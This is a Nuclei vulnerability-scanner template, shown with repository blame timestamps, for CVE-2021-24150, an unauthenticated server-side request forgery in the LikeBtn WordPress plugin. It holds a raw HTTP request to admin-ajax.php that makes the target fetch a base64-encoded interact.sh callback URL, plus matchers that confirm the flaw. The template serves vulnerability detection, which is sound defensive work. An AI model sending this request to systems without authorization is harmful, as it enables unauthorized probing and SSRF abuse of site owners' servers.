nuclei-templates/cves/2021/CVE-2021-24150.yaml

39 lines
1.1 KiB
YAML
Raw Normal View History

2022-10-06 14:22:13 +00:00
id: CVE-2021-24150
info:
name: Like Button Rating < 2.6.32 - Unauthenticated Full-Read SSRF
author: theamanrawat
severity: high
description: |
The LikeBtn WordPress plugin was vulnerable to Unauthenticated Full-Read Server-Side Request Forgery (SSRF).
reference:
- https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb
- https://wordpress.org/plugins/likebtn-like-button/
2022-10-06 19:12:17 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24150
2022-10-06 14:22:13 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-10-06 14:22:13 +00:00
cve-id: CVE-2021-24150
cwe-id: CWE-918
2022-10-06 14:22:13 +00:00
metadata:
verified: "true"
2022-10-06 19:32:42 +00:00
tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button
2022-10-06 14:22:13 +00:00
requests:
2022-10-06 19:32:42 +00:00
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.interact.sh')}}" HTTP/1.1
Host: {{Hostname}}
2022-10-06 14:22:13 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Interactsh Server"
- type: status
status:
2022-10-06 19:12:17 +00:00
- 200